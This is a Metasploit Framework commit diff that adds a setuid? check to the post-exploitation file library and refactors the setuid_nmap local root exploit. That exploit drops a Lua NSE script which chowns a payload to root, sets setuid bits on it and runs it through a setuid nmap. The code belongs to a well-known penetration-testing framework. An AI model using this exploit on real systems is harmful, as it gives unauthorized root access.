infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9446, Post API fix for setuid_nmap

MS-2855/keylogger-mettle-extension
William Vu 2018-01-25 16:00:40 -06:00
parent dee1ef0185 5684b9ed7c
commit 309deb9ee7
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
2 changed files with 38 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
lib/msf/core/post/file.rb
View File

@ -59,7 +59,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def directory?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.directory?
@ -70,9 +70,9 @@ module Msf::Post::File
f = session.shell_command_token("test -d \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@ -93,7 +93,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def file?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.file?
@ -107,20 +107,40 @@ module Msf::Post::File
f = session.shell_command_token("test -f \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
alias file_exist? file?
#
# See if +path+ on the remote system is a setuid file
#
# @param path [String] Remote filename to check
def setuid?(path)
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.setuid?
else
if session.platform != 'windows'
f = session.shell_command_token("test -u \"#{path}\" && echo true")
end
return false if f.nil? || f.empty?
return false unless f =~ /true/
true
end
end
#
# Check for existence of +path+ on the remote file system
#
# @param path [String] Remote filename to check
def exist?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return !!(stat)
else
@ -130,9 +150,9 @@ module Msf::Post::File
f = cmd_exec("test -e \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@ -290,7 +310,7 @@ module Msf::Post::File
end
end
return true
true
end
#
@ -314,7 +334,7 @@ module Msf::Post::File
_write_file_unix_shell(file_name, data, true)
end
end
return true
true
end
#

15
modules/exploits/unix/local/setuid_nmap.rb
View File

@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
stat = session.fs.file.stat(datastore["Nmap"])
if stat and stat.file? and stat.setuid?
vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
if setuid?(datastore['Nmap'])
vprint_good("#{datastore['Nmap']} is setuid")
return CheckCode::Vulnerable
end
return CheckCode::Safe
CheckCode::Safe
end
def exploit
@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
write_file(exe_file, generate_payload_exe)
evil_lua = %Q{
os.execute("chown root:root #{exe_file}");
os.execute("chmod 6777 #{exe_file}");
os.execute("chmod 6700 #{exe_file}");
os.execute("#{exe_file} &");
os.execute("rm #{exe_file}");
os.execute("rm -f #{exe_file}");
}
end
lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
print_status("Dropping lua #{lua_file}")
write_file(lua_file, evil_lua)
print_status("running")
print_status("Running #{lua_file} with Nmap")
scriptname = lua_file
if (lua_file[0,1] == "/")
@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
# Versions before 4.75 (August 2008) will not run scripts without a port scan
cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
ensure
cmd_exec "rm -f #{lua_file} #{exe_file}"
rm_f(lua_file, exe_file)
end
end